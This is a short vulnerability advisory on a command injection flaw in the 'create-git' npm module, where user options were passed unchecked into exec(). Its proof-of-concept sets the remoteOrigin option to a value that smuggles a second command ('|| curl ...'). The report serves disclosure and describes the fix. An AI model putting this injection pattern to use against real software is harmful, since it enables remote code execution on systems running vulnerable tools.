[create-git] RCE via insecure command formatting

The `create-git` NPM module was vulnerable against `command injection` which was possible since some `user supplied inputs` were concatenated without proper checks inside a `exec()` call, which made possible executing `arbitrary commands` besides the `git` one (which is used by the tool). The PoC resulted in: ```js // poc.js const createGit = require('create-git') createGit({ ignoreExisting: true, initialCommitMessage: 'test', remoteOrigin: 'http://evil.com || curl "http://localhost/RCE"', ignoreTemplates: ['Node.gitignore'] }) ``` The vulnerability has been fixed checking the inputted data and using `safe functions` to execute commands, which replaced `exec()` occurrences.